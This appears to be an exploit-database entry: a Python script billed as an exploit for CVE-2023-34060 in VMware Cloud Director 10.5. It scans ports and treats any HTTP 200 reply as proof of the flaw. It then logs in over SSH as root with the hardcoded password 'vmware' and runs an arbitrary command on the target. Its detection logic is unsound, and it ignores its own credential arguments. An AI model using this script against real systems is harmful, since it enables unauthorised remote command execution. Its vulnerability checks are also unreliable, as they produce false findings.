VMware Cloud Director 10.5 - Bypass Identity Verification - CVE-2023-34060

1. # Exploit Title: [VMware Cloud Director | Bypass identity verification]
2. # Google Dork: [non]
3. # Date: [12/06/2023]
4. # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
5. # Version: [10.5]
6. # CVE : [CVE-2023-34060]
7. import requests
8. import paramiko
9. import subprocess
10. import socket
11. import argparse
12. import threading
13.  
14. # Define a function to check if a port is open
15. def is_port_open(ip, port):
16.     # Create a socket object
17.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18.     # Set the timeout to 1 second
19.     s.settimeout(1)
20.     # Try to connect to the port
21.     try:
22.         s.connect((ip, port))
23.         # The port is open
24.         return True
25.     except:
26.         # The port is closed
27.         return False
28.     finally:
29.         # Close the socket
30.         s.close()
31.  
32. # Define a function to exploit a vulnerable device
33. def exploit_device(ip, port, username, password, command):
34.     # Create a ssh client object
35.     client = paramiko.SSHClient()
36.     # Set the policy to accept any host key
37.     client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
38.     # Connect to the target using the credentials
39.     client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
40.     # Execute the command and get the output
41.     stdin, stdout, stderr = client.exec_command(command)
42.     # Print the output
43.     print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
44.     # Close the ssh connection
45.     client.close()
46.  
47.  
48. # Parse the arguments from the user
49. parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
50. parser.add_argument("ip", help="The target IP address")
51. parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
52. parser.add_argument("-u", "--username", default="root", help="The username for ssh")
53. parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
54. parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
55. args = parser.parse_args()
56.  
57. # Loop through the ports and check for the vulnerability
58. for port in args.ports:
59.     # Check if the port is open
60.     if is_port_open(args.ip, port):
61.         # The port is open, send a GET request to the port and check the status code
62.         response = requests.get(f"http://{args.ip}:{port}")
63.         if response.status_code == 200:
64.             # The port is open and vulnerable
65.             print(f"Port {port} is vulnerable to CVE-2023-34060")
66.             # Create a thread to exploit the device
67.             thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
68.             # Start the thread
69.             thread.start()
70.         else:
71.             # The port is open but not vulnerable
72.             print(f"Port {port} is not vulnerable to CVE-2023-34060")
73.     else:
74.         # The port is closed
75.         print(f"Port {port} is closed")
76.